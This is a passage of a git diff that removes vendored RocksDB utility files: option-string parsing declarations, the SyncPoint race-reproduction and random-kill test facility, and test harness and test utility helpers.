-// that will be escaped when EscapeOptionString() is called.
-//
-// @param c the input char
-// @return true if the input char "c" is considered as a special character.
-// @see EscapeOptionString
-bool isSpecialChar(const char c);
-
-// If the input char is an escaped char, it will return the its
-// associated raw-char.  Otherwise, the function will simply return
-// the original input char.
-char UnescapeChar(const char c);
-
-// If the input char is a control char, it will return the its
-// associated escaped char.  Otherwise, the function will simply return
-// the original input char.
-char EscapeChar(const char c);
-
-// Converts a raw string to an escaped string.  Escaped-characters are
-// defined via the isSpecialChar() function.  When a char in the input
-// string "raw_string" is classified as a special characters, then it
-// will be prefixed by '\' in the output.
-//
-// It's inverse function is UnescapeOptionString().
-// @param raw_string the input string
-// @return the '\' escaped string of the input "raw_string"
-// @see isSpecialChar, UnescapeOptionString
-std::string EscapeOptionString(const std::string& raw_string);
-
-// The inverse function of EscapeOptionString.  It converts
-// an '\' escaped string back to a raw string.
-//
-// @param escaped_string the input '\' escaped string
-// @return the raw string of the input "escaped_string"
-std::string UnescapeOptionString(const std::string& escaped_string);
-
-std::string trim(const std::string& str);
-
-#ifndef ROCKSDB_LITE
-bool ParseBoolean(const std::string& type, const std::string& value);
-
-uint32_t ParseUint32(const std::string& value);
-#endif
-
-uint64_t ParseUint64(const std::string& value);
-
-int ParseInt(const std::string& value);
-
-double ParseDouble(const std::string& value);
-
-size_t ParseSizeT(const std::string& value);
-
-std::vector<int> ParseVectorInt(const std::string& value);
-
-bool SerializeIntVector(const std::vector<int>& vec, std::string* value);
-
-extern const std::string kNullptrString;
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/sync_point.cc b/thirdparty/rocksdb/util/sync_point.cc
deleted file mode 100644
index c8c9fbc..0000000
--- a/thirdparty/rocksdb/util/sync_point.cc
+++ /dev/null
@@ -1,170 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/sync_point.h"
-#include <functional>
-#include <thread>
-#include "port/port.h"
-#include "util/random.h"
-
-int rocksdb_kill_odds = 0;
-std::vector<std::string> rocksdb_kill_prefix_blacklist;
-
-#ifndef NDEBUG
-namespace rocksdb {
-
-void TestKillRandom(std::string kill_point, int odds,
-                    const std::string& srcfile, int srcline) {
-  for (auto& p : rocksdb_kill_prefix_blacklist) {
-    if (kill_point.substr(0, p.length()) == p) {
-      return;
-    }
-  }
-
-  assert(odds > 0);
-  if (odds % 7 == 0) {
-    // class Random uses multiplier 16807, which is 7^5. If odds are
-    // multiplier of 7, there might be limited values generated.
-    odds++;
-  }
-  auto* r = Random::GetTLSInstance();
-  bool crash = r->OneIn(odds);
-  if (crash) {
-    port::Crash(srcfile, srcline);
-  }
-}
-
-SyncPoint* SyncPoint::GetInstance() {
-  static SyncPoint sync_point;
-  return &sync_point;
-}
-
-void SyncPoint::LoadDependency(const std::vector<SyncPointPair>& dependencies) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  successors_.clear();
-  predecessors_.clear();
-  cleared_points_.clear();
-  for (const auto& dependency : dependencies) {
-    successors_[dependency.predecessor].push_back(dependency.successor);
-    predecessors_[dependency.successor].push_back(dependency.predecessor);
-  }
-  cv_.notify_all();
-}
-
-void SyncPoint::LoadDependencyAndMarkers(
-    const std::vector<SyncPointPair>& dependencies,
-    const std::vector<SyncPointPair>& markers) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  successors_.clear();
-  predecessors_.clear();
-  cleared_points_.clear();
-  markers_.clear();
-  marked_thread_id_.clear();
-  for (const auto& dependency : dependencies) {
-    successors_[dependency.predecessor].push_back(dependency.successor);
-    predecessors_[dependency.successor].push_back(dependency.predecessor);
-  }
-  for (const auto& marker : markers) {
-    successors_[marker.predecessor].push_back(marker.successor);
-    predecessors_[marker.successor].push_back(marker.predecessor);
-    markers_[marker.predecessor].push_back(marker.successor);
-  }
-  cv_.notify_all();
-}
-
-bool SyncPoint::PredecessorsAllCleared(const std::string& point) {
-  for (const auto& pred : predecessors_[point]) {
-    if (cleared_points_.count(pred) == 0) {
-      return false;
-    }
-  }
-  return true;
-}
-
-void SyncPoint::SetCallBack(const std::string point,
-                            std::function<void(void*)> callback) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  callbacks_[point] = callback;
-}
-
-void SyncPoint::ClearCallBack(const std::string point) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  while (num_callbacks_running_ > 0) {
-    cv_.wait(lock);
-  }
-  callbacks_.erase(point);
-}
-
-void SyncPoint::ClearAllCallBacks() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  while (num_callbacks_running_ > 0) {
-    cv_.wait(lock);
-  }
-  callbacks_.clear();
-}
-
-void SyncPoint::EnableProcessing() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  enabled_ = true;
-}
-
-void SyncPoint::DisableProcessing() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  enabled_ = false;
-}
-
-void SyncPoint::ClearTrace() {
-  std::unique_lock<std::mutex> lock(mutex_);
-  cleared_points_.clear();
-}
-
-bool SyncPoint::DisabledByMarker(const std::string& point,
-                                 std::thread::id thread_id) {
-  auto marked_point_iter = marked_thread_id_.find(point);
-  return marked_point_iter != marked_thread_id_.end() &&
-         thread_id != marked_point_iter->second;
-}
-
-void SyncPoint::Process(const std::string& point, void* cb_arg) {
-  std::unique_lock<std::mutex> lock(mutex_);
-  if (!enabled_) {
-    return;
-  }
-
-  auto thread_id = std::this_thread::get_id();
-
-  auto marker_iter = markers_.find(point);
-  if (marker_iter != markers_.end()) {
-    for (auto marked_point : marker_iter->second) {
-      marked_thread_id_.insert(std::make_pair(marked_point, thread_id));
-    }
-  }
-
-  if (DisabledByMarker(point, thread_id)) {
-    return;
-  }
-
-  while (!PredecessorsAllCleared(point)) {
-    cv_.wait(lock);
-    if (DisabledByMarker(point, thread_id)) {
-      return;
-    }
-  }
-
-  auto callback_pair = callbacks_.find(point);
-  if (callback_pair != callbacks_.end()) {
-    num_callbacks_running_++;
-    mutex_.unlock();
-    callback_pair->second(cb_arg);
-    mutex_.lock();
-    num_callbacks_running_--;
-    cv_.notify_all();
-  }
-
-  cleared_points_.insert(point);
-  cv_.notify_all();
-}
-}  // namespace rocksdb
-#endif  // NDEBUG
diff --git a/thirdparty/rocksdb/util/sync_point.h b/thirdparty/rocksdb/util/sync_point.h
deleted file mode 100644
index ada61be..0000000
--- a/thirdparty/rocksdb/util/sync_point.h
+++ /dev/null
@@ -1,140 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <assert.h>
-#include <condition_variable>
-#include <functional>
-#include <mutex>
-#include <string>
-#include <thread>
-#include <unordered_map>
-#include <unordered_set>
-#include <vector>
-
-// This is only set from db_stress.cc and for testing only.
-// If non-zero, kill at various points in source code with probability 1/this
-extern int rocksdb_kill_odds;
-// If kill point has a prefix on this list, will skip killing.
-extern std::vector<std::string> rocksdb_kill_prefix_blacklist;
-
-#ifdef NDEBUG
-// empty in release build
-#define TEST_KILL_RANDOM(kill_point, rocksdb_kill_odds)
-#else
-
-namespace rocksdb {
-// Kill the process with probablity 1/odds for testing.
-extern void TestKillRandom(std::string kill_point, int odds,
-                           const std::string& srcfile, int srcline);
-
-// To avoid crashing always at some frequently executed codepaths (during
-// kill random test), use this factor to reduce odds
-#define REDUCE_ODDS 2
-#define REDUCE_ODDS2 4
-
-#define TEST_KILL_RANDOM(kill_point, rocksdb_kill_odds)                  \
-  {                                                                      \
-    if (rocksdb_kill_odds > 0) {                                         \
-      TestKillRandom(kill_point, rocksdb_kill_odds, __FILE__, __LINE__); \
-    }                                                                    \
-  }
-}  // namespace rocksdb
-#endif
-
-#ifdef NDEBUG
-#define TEST_SYNC_POINT(x)
-#define TEST_SYNC_POINT_CALLBACK(x, y)
-#else
-
-namespace rocksdb {
-
-// This class provides facility to reproduce race conditions deterministically
-// in unit tests.
-// Developer could specify sync points in the codebase via TEST_SYNC_POINT.
-// Each sync point represents a position in the execution stream of a thread.
-// In the unit test, 'Happens After' relationship among sync points could be
-// setup via SyncPoint::LoadDependency, to reproduce a desired interleave of
-// threads execution.
-// Refer to (DBTest,TransactionLogIteratorRace), for an example use case.
-
-class SyncPoint {
- public:
-  static SyncPoint* GetInstance();
-
-  struct SyncPointPair {
-    std::string predecessor;
-    std::string successor;
-  };
-
-  // call once at the beginning of a test to setup the dependency between
-  // sync points
-  void LoadDependency(const std::vector<SyncPointPair>& dependencies);
-
-  // call once at the beginning of a test to setup the dependency between
-  // sync points and setup markers indicating the successor is only enabled
-  // when it is processed on the same thread as the predecessor.
-  // When adding a marker, it implicitly adds a dependency for the marker pair.
-  void LoadDependencyAndMarkers(const std::vector<SyncPointPair>& dependencies,
-                                const std::vector<SyncPointPair>& markers);
-
-  // Set up a call back function in sync point.
-  void SetCallBack(const std::string point,
-                   std::function<void(void*)> callback);
-
-  // Clear callback function by point
-  void ClearCallBack(const std::string point);
-
-  // Clear all call back functions.
-  void ClearAllCallBacks();
-
-  // enable sync point processing (disabled on startup)
-  void EnableProcessing();
-
-  // disable sync point processing
-  void DisableProcessing();
-
-  // remove the execution trace of all sync points
-  void ClearTrace();
-
-  // triggered by TEST_SYNC_POINT, blocking execution until all predecessors
-  // are executed.
-  // And/or call registered callback functionn, with argument `cb_arg`
-  void Process(const std::string& point, void* cb_arg = nullptr);
-
-  // TODO: it might be useful to provide a function that blocks until all
-  // sync points are cleared.
-
- private:
-  bool PredecessorsAllCleared(const std::string& point);
-  bool DisabledByMarker(const std::string& point, std::thread::id thread_id);
-
-  // successor/predecessor map loaded from LoadDependency
-  std::unordered_map<std::string, std::vector<std::string>> successors_;
-  std::unordered_map<std::string, std::vector<std::string>> predecessors_;
-  std::unordered_map<std::string, std::function<void(void*)> > callbacks_;
-  std::unordered_map<std::string, std::vector<std::string> > markers_;
-  std::unordered_map<std::string, std::thread::id> marked_thread_id_;
-
-  std::mutex mutex_;
-  std::condition_variable cv_;
-  // sync points that have been passed through
-  std::unordered_set<std::string> cleared_points_;
-  bool enabled_ = false;
-  int num_callbacks_running_ = 0;
-};
-
-}  // namespace rocksdb
-
-// Use TEST_SYNC_POINT to specify sync points inside code base.
-// Sync points can have happens-after depedency on other sync points,
-// configured at runtime via SyncPoint::LoadDependency. This could be
-// utilized to re-produce race conditions between threads.
-// See TransactionLogIteratorRace in db_test.cc for an example use case.
-// TEST_SYNC_POINT is no op in release build.
-#define TEST_SYNC_POINT(x) rocksdb::SyncPoint::GetInstance()->Process(x)
-#define TEST_SYNC_POINT_CALLBACK(x, y) \
-  rocksdb::SyncPoint::GetInstance()->Process(x, y)
-#endif  // NDEBUG
diff --git a/thirdparty/rocksdb/util/testharness.cc b/thirdparty/rocksdb/util/testharness.cc
deleted file mode 100644
index 4626ea0..0000000
--- a/thirdparty/rocksdb/util/testharness.cc
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/testharness.h"
-#include <string>
-
-namespace rocksdb {
-namespace test {
-
-
-std::string TmpDir(Env* env) {
-  std::string dir;
-  Status s = env->GetTestDirectory(&dir);
-  EXPECT_TRUE(s.ok()) << s.ToString();
-  return dir;
-}
-
-int RandomSeed() {
-  const char* env = getenv("TEST_RANDOM_SEED");
-  int result = (env != nullptr ? atoi(env) : 301);
-  if (result <= 0) {
-    result = 301;
-  }
-  return result;
-}
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/testharness.h b/thirdparty/rocksdb/util/testharness.h
deleted file mode 100644
index 44ee76e..0000000
--- a/thirdparty/rocksdb/util/testharness.h
+++ /dev/null
@@ -1,27 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-namespace test {
-
-// Return the directory to use for temporary storage.
-std::string TmpDir(Env* env = Env::Default());
-
-// Return a randomization seed for this run.  Typically returns the
-// same number on repeated invocations of this binary, but automated
-// runs may be able to vary the seed.
-int RandomSeed();
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/testutil.cc b/thirdparty/rocksdb/util/testutil.cc
deleted file mode 100644
index f3010f3..0000000
--- a/thirdparty/rocksdb/util/testutil.cc
+++ /dev/null
@@ -1,401 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/testutil.h"
-
-#include <cctype>
-#include <sstream>
-
-#include "db/memtable_list.h"
-#include "port/port.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace test {
-
-Slice RandomString(Random* rnd, int len, std::string* dst) {
-  dst->resize(len);
-  for (int i = 0; i < len; i++) {
-    (*dst)[i] = static_cast<char>(' ' + rnd->Uniform(95));   // ' ' .. '~'
-  }
-  return Slice(*dst);
-}
-
-extern std::string RandomHumanReadableString(Random* rnd, int len) {
-  std::string ret;
-  ret.resize(len);
-  for (int i = 0; i < len; ++i) {
-    ret[i] = static_cast<char>('a' + rnd->Uniform(26));
-  }
-  return ret;
-}
-
-std::string RandomKey(Random* rnd, int len, RandomKeyType type) {
-  // Make sure to generate a wide variety of characters so we
-  // test the boundary conditions for short-key optimizations.
-  static const char kTestChars[] = {
-    '\0', '\1', 'a', 'b', 'c', 'd', 'e', '\xfd', '\xfe', '\xff'
-  };
-  std::string result;
-  for (int i = 0; i < len; i++) {
-    std::size_t indx = 0;
-    switch (type) {
-      case RandomKeyType::RANDOM:
-        indx = rnd->Uniform(sizeof(kTestChars));
-        break;
-      case RandomKeyType::LARGEST:
-        indx = sizeof(kTestChars) - 1;
-        break;
-      case RandomKeyType::MIDDLE:
-        indx = sizeof(kTestChars) / 2;
-        break;
-      case RandomKeyType::SMALLEST:
-        indx = 0;
-        break;
-    }
-    result += kTestChars[indx];
-  }
-  return result;
-}
-
-
-extern Slice CompressibleString(Random* rnd, double compressed_fraction,
-                                int len, std::string* dst) {
-  int raw = static_cast<int>(len * compressed_fraction);
-  if (raw < 1) raw = 1;
-  std::string raw_data;
-  RandomString(rnd, raw, &raw_data);
-
-  // Duplicate the random data until we have filled "len" bytes
-  dst->clear();
-  while (dst->size() < (unsigned int)len) {
-    dst->append(raw_data);
-  }
-  dst->resize(len);
-  return Slice(*dst);
-}
-
-namespace {
-class Uint64ComparatorImpl : public Comparator {
- public:
-  Uint64ComparatorImpl() { }
-
-  virtual const char* Name() const override {
-    return "rocksdb.Uint64Comparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    assert(a.size() == sizeof(uint64_t) && b.size() == sizeof(uint64_t));
-    const uint64_t* left = reinterpret_cast<const uint64_t*>(a.data());
-    const uint64_t* right = reinterpret_cast<const uint64_t*>(b.data());
-    uint64_t leftValue;
-    uint64_t rightValue;
-    GetUnaligned(left, &leftValue);
-    GetUnaligned(right, &rightValue);
-    if (leftValue == rightValue) {
-      return 0;
-    } else if (leftValue < rightValue) {
-      return -1;
-    } else {
-      return 1;
-    }
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-      const Slice& limit) const override {
-    return;
-  }
-
-  virtual void FindShortSuccessor(std::string* key) const override {
-    return;
-  }
-};
-}  // namespace
-
-static port::OnceType once;
-static const Comparator* uint64comp;
-
-static void InitModule() {
-  uint64comp = new Uint64ComparatorImpl;
-}
-
-const Comparator* Uint64Comparator() {
-  port::InitOnce(&once, InitModule);
-  return uint64comp;
-}
-
-WritableFileWriter* GetWritableFileWriter(WritableFile* wf) {
-  unique_ptr<WritableFile> file(wf);
-  return new WritableFileWriter(std::move(file), EnvOptions());
-}
-
-RandomAccessFileReader* GetRandomAccessFileReader(RandomAccessFile* raf) {
-  unique_ptr<RandomAccessFile> file(raf);
-  return new RandomAccessFileReader(std::move(file),
-                                    "[test RandomAccessFileReader]");
-}
-
-SequentialFileReader* GetSequentialFileReader(SequentialFile* se) {
-  unique_ptr<SequentialFile> file(se);
-  return new SequentialFileReader(std::move(file));
-}
-
-void CorruptKeyType(InternalKey* ikey) {
-  std::string keystr = ikey->Encode().ToString();
-  keystr[keystr.size() - 8] = kTypeLogData;
-  ikey->DecodeFrom(Slice(keystr.data(), keystr.size()));
-}
-
-std::string KeyStr(const std::string& user_key, const SequenceNumber& seq,
-                   const ValueType& t, bool corrupt) {
-  InternalKey k(user_key, seq, t);
-  if (corrupt) {
-    CorruptKeyType(&k);
-  }
-  return k.Encode().ToString();
-}
-
-std::string RandomName(Random* rnd, const size_t len) {
-  std::stringstream ss;
-  for (size_t i = 0; i < len; ++i) {
-    ss << static_cast<char>(rnd->Uniform(26) + 'a');
-  }
-  return ss.str();
-}
-
-CompressionType RandomCompressionType(Random* rnd) {
-  return static_cast<CompressionType>(rnd->Uniform(6));
-}
-
-void RandomCompressionTypeVector(const size_t count,
-                                 std::vector<CompressionType>* types,
-                                 Random* rnd) {
-  types->clear();
-  for (size_t i = 0; i < count; ++i) {
-    types->emplace_back(RandomCompressionType(rnd));
-  }
-}
-
-const SliceTransform* RandomSliceTransform(Random* rnd, int pre_defined) {
-  int random_num = pre_defined >= 0 ? pre_defined : rnd->Uniform(4);
-  switch (random_num) {
-    case 0:
-      return NewFixedPrefixTransform(rnd->Uniform(20) + 1);
-    case 1:
-      return NewCappedPrefixTransform(rnd->Uniform(20) + 1);
-    case 2:
-      return NewNoopTransform();
-    default:
-      return nullptr;
-  }
-}
-
-BlockBasedTableOptions RandomBlockBasedTableOptions(Random* rnd) {
-  BlockBasedTableOptions opt;
-  opt.cache_index_and_filter_blocks = rnd->Uniform(2);
-  opt.pin_l0_filter_and_index_blocks_in_cache = rnd->Uniform(2);
-  opt.index_type = rnd->Uniform(2) ? BlockBasedTableOptions::kBinarySearch
-                                   : BlockBasedTableOptions::kHashSearch;
-  opt.hash_index_allow_collision = rnd->Uniform(2);
-  opt.checksum = static_cast<ChecksumType>(rnd->Uniform(3));
-  opt.block_size = rnd->Uniform(10000000);
-  opt.block_size_deviation = rnd->Uniform(100);
-  opt.block_restart_interval = rnd->Uniform(100);
-  opt.index_block_restart_interval = rnd->Uniform(100);
-  opt.whole_key_filtering = rnd->Uniform(2);
-
-  return opt;
-}
-
-TableFactory* RandomTableFactory(Random* rnd, int pre_defined) {
-#ifndef ROCKSDB_LITE
-  int random_num = pre_defined >= 0 ? pre_defined : rnd->Uniform(4);
-  switch (random_num) {
-    case 0:
-      return NewPlainTableFactory();
-    case 1:
-      return NewCuckooTableFactory();
-    default:
-      return NewBlockBasedTableFactory();
-  }
-#else
-  return NewBlockBasedTableFactory();
-#endif  // !ROCKSDB_LITE
-}
-
-MergeOperator* RandomMergeOperator(Random* rnd) {
-  return new ChanglingMergeOperator(RandomName(rnd, 10));
-}
-
-CompactionFilter* RandomCompactionFilter(Random* rnd) {
-  return new ChanglingCompactionFilter(RandomName(rnd, 10));
-}
-
-CompactionFilterFactory* RandomCompactionFilterFactory(Random* rnd) {
-  return new ChanglingCompactionFilterFactory(RandomName(rnd, 10));
-}
-
-void RandomInitDBOptions(DBOptions* db_opt, Random* rnd) {
-  // boolean options
-  db_opt->advise_random_on_open = rnd->Uniform(2);
-  db_opt->allow_mmap_reads = rnd->Uniform(2);
-  db_opt->allow_mmap_writes = rnd->Uniform(2);
-  db_opt->use_direct_reads = rnd->Uniform(2);
-  db_opt->use_direct_io_for_flush_and_compaction = rnd->Uniform(2);
-  db_opt->create_if_missing = rnd->Uniform(2);
-  db_opt->create_missing_column_families = rnd->Uniform(2);
-  db_opt->enable_thread_tracking = rnd->Uniform(2);
-  db_opt->error_if_exists = rnd->Uniform(2);
-  db_opt->is_fd_close_on_exec = rnd->Uniform(2);
-  db_opt->paranoid_checks = rnd->Uniform(2);
-  db_opt->skip_log_error_on_recovery = rnd->Uniform(2);
-  db_opt->skip_stats_update_on_db_open = rnd->Uniform(2);
-  db_opt->use_adaptive_mutex = rnd->Uniform(2);
-  db_opt->use_fsync = rnd->Uniform(2);
-  db_opt->recycle_log_file_num = rnd->Uniform(2);
-  db_opt->avoid_flush_during_recovery = rnd->Uniform(2);
-  db_opt->avoid_flush_during_shutdown = rnd->Uniform(2);
-
-  // int options
-  db_opt->max_background_compactions = rnd->Uniform(100);
-  db_opt->max_background_flushes = rnd->Uniform(100);
-  db_opt->max_file_opening_threads = rnd->Uniform(100);
-  db_opt->max_open_files = rnd->Uniform(100);
-  db_opt->table_cache_numshardbits = rnd->Uniform(100);
-
-  // size_t options
-  db_opt->db_write_buffer_size = rnd->Uniform(10000);
-  db_opt->keep_log_file_num = rnd->Uniform(10000);
-  db_opt->log_file_time_to_roll = rnd->Uniform(10000);
-  db_opt->manifest_preallocation_size = rnd->Uniform(10000);
-  db_opt->max_log_file_size = rnd->Uniform(10000);
-
-  // std::string options
-  db_opt->db_log_dir = "path/to/db_log_dir";
-  db_opt->wal_dir = "path/to/wal_dir";
-
-  // uint32_t options
-  db_opt->max_subcompactions = rnd->Uniform(100000);
-
-  // uint64_t options
-  static const uint64_t uint_max = static_cast<uint64_t>(UINT_MAX);
-  db_opt->WAL_size_limit_MB = uint_max + rnd->Uniform(100000);
-  db_opt->WAL_ttl_seconds = uint_max + rnd->Uniform(100000);
-  db_opt->bytes_per_sync = uint_max + rnd->Uniform(100000);
-  db_opt->delayed_write_rate = uint_max + rnd->Uniform(100000);
-  db_opt->delete_obsolete_files_period_micros = uint_max + rnd->Uniform(100000);
-  db_opt->max_manifest_file_size = uint_max + rnd->Uniform(100000);
-  db_opt->max_total_wal_size = uint_max + rnd->Uniform(100000);
-  db_opt->wal_bytes_per_sync = uint_max + rnd->Uniform(100000);
-
-  // unsigned int options
-  db_opt->stats_dump_period_sec = rnd->Uniform(100000);
-}
-
-void RandomInitCFOptions(ColumnFamilyOptions* cf_opt, Random* rnd) {
-  cf_opt->compaction_style = (CompactionStyle)(rnd->Uniform(4));
-
-  // boolean options
-  cf_opt->report_bg_io_stats = rnd->Uniform(2);
-  cf_opt->disable_auto_compactions = rnd->Uniform(2);
-  cf_opt->inplace_update_support = rnd->Uniform(2);
-  cf_opt->level_compaction_dynamic_level_bytes = rnd->Uniform(2);
-  cf_opt->optimize_filters_for_hits = rnd->Uniform(2);
-  cf_opt->paranoid_file_checks = rnd->Uniform(2);
-  cf_opt->purge_redundant_kvs_while_flush = rnd->Uniform(2);
-  cf_opt->force_consistency_checks = rnd->Uniform(2);
-
-  // double options
-  cf_opt->hard_rate_limit = static_cast<double>(rnd->Uniform(10000)) / 13;
-  cf_opt->soft_rate_limit = static_cast<double>(rnd->Uniform(10000)) / 13;
-  cf_opt->memtable_prefix_bloom_size_ratio =
-      static_cast<double>(rnd->Uniform(10000)) / 20000.0;
-
-  // int options
-  cf_opt->level0_file_num_compaction_trigger = rnd->Uniform(100);
-  cf_opt->level0_slowdown_writes_trigger = rnd->Uniform(100);
-  cf_opt->level0_stop_writes_trigger = rnd->Uniform(100);
-  cf_opt->max_bytes_for_level_multiplier = rnd->Uniform(100);
-  cf_opt->max_mem_compaction_level = rnd->Uniform(100);
-  cf_opt->max_write_buffer_number = rnd->Uniform(100);
-  cf_opt->max_write_buffer_number_to_maintain = rnd->Uniform(100);
-  cf_opt->min_write_buffer_number_to_merge = rnd->Uniform(100);
-  cf_opt->num_levels = rnd->Uniform(100);
-  cf_opt->target_file_size_multiplier = rnd->Uniform(100);
-
-  // vector int options
-  cf_opt->max_bytes_for_level_multiplier_additional.resize(cf_opt->num_levels);
-  for (int i = 0; i < cf_opt->num_levels; i++) {
-    cf_opt->max_bytes_for_level_multiplier_additional[i] = rnd->Uniform(100);
-  }
-
-  // size_t options
-  cf_opt->arena_block_size = rnd->Uniform(10000);
-  cf_opt->inplace_update_num_locks = rnd->Uniform(10000);
-  cf_opt->max_successive_merges = rnd->Uniform(10000);
-  cf_opt->memtable_huge_page_size = rnd->Uniform(10000);
-  cf_opt->write_buffer_size = rnd->Uniform(10000);
-
-  // uint32_t options
-  cf_opt->bloom_locality = rnd->Uniform(10000);
-  cf_opt->max_bytes_for_level_base = rnd->Uniform(10000);
-
-  // uint64_t options
-  static const uint64_t uint_max = static_cast<uint64_t>(UINT_MAX);
-  cf_opt->max_sequential_skip_in_iterations = uint_max + rnd->Uniform(10000);
-  cf_opt->target_file_size_base = uint_max + rnd->Uniform(10000);
-  cf_opt->max_compaction_bytes =
-      cf_opt->target_file_size_base * rnd->Uniform(100);
-
-  // unsigned int options
-  cf_opt->rate_limit_delay_max_milliseconds = rnd->Uniform(10000);
-
-  // pointer typed options
-  cf_opt->prefix_extractor.reset(RandomSliceTransform(rnd));
-  cf_opt->table_factory.reset(RandomTableFactory(rnd));
-  cf_opt->merge_operator.reset(RandomMergeOperator(rnd));
-  if (cf_opt->compaction_filter) {
-    delete cf_opt->compaction_filter;
-  }
-  cf_opt->compaction_filter = RandomCompactionFilter(rnd);
-  cf_opt->compaction_filter_factory.reset(RandomCompactionFilterFactory(rnd));
-
-  // custom typed options
-  cf_opt->compression = RandomCompressionType(rnd);
-  RandomCompressionTypeVector(cf_opt->num_levels,
-                              &cf_opt->compression_per_level, rnd);
-}
-
-Status DestroyDir(Env* env, const std::string& dir) {
-  Status s;
-  if (env->FileExists(dir).IsNotFound()) {
-    return s;
-  }
-  std::vector<std::string> files_in_dir;
-  s = env->GetChildren(dir, &files_in_dir);
-  if (s.ok()) {
-    for (auto& file_in_dir : files_in_dir) {
-      if (file_in_dir == "." || file_in_dir == "..") {
-        continue;
-      }
-      s = env->DeleteFile(dir + "/" + file_in_dir);
-      if (!s.ok()) {
-        break;
-      }
-    }
-  }
-
-  if (s.ok()) {
-    s = env->DeleteDir(dir);
-  }
-  return s;
-}
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/testutil.h b/thirdparty/rocksdb/util/testutil.h
deleted file mode 100644
index 02bfb0f..0000000
--- a/thirdparty/rocksdb/util/testutil.h
+++ /dev/null
@@ -1,744 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <algorithm>
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/internal_iterator.h"
-#include "table/plain_table_factory.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-
-namespace rocksdb {
-class SequentialFile;
-class SequentialFileReader;
-
-namespace test {
-
-// Store in *dst a random string of length "len" and return a Slice that
-// references the generated data.
-extern Slice RandomString(Random* rnd, int len, std::string* dst);
-
-extern std::string RandomHumanReadableString(Random* rnd, int len);
-
-// Return a random key with the specified length that may contain interesting
-// characters (e.g. \x00, \xff, etc.).
-enum RandomKeyType : char { RANDOM, LARGEST, SMALLEST, MIDDLE };
-extern std::string RandomKey(Random* rnd, int len,
-                             RandomKeyType type = RandomKeyType::RANDOM);
-
-// Store in *dst a string of length "len" that will compress to
-// "N*compressed_fraction" bytes and return a Slice that references
-// the generated data.
-extern Slice CompressibleString(Random* rnd, double compressed_fraction,
-                                int len, std::string* dst);
-
-// A wrapper that allows injection of errors.
-class ErrorEnv : public EnvWrapper {
- public:
-  bool writable_file_error_;
-  int num_writable_file_errors_;
-
-  ErrorEnv() : EnvWrapper(Env::Default()),
-               writable_file_error_(false),
-               num_writable_file_errors_(0) { }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& soptions) override {
-    result->reset();
-    if (writable_file_error_) {
-      ++num_writable_file_errors_;
-      return Status::IOError(fname, "fake error");
-    }
-    return target()->NewWritableFile(fname, result, soptions);
-  }
-};
-
-// An internal comparator that just forward comparing results from the
-// user comparator in it. Can be used to test entities that have no dependency
-// on internal key structure but consumes InternalKeyComparator, like
-// BlockBasedTable.
-class PlainInternalKeyComparator : public InternalKeyComparator {
- public:
-  explicit PlainInternalKeyComparator(const Comparator* c)
-      : InternalKeyComparator(c) {}
-
-  virtual ~PlainInternalKeyComparator() {}
-
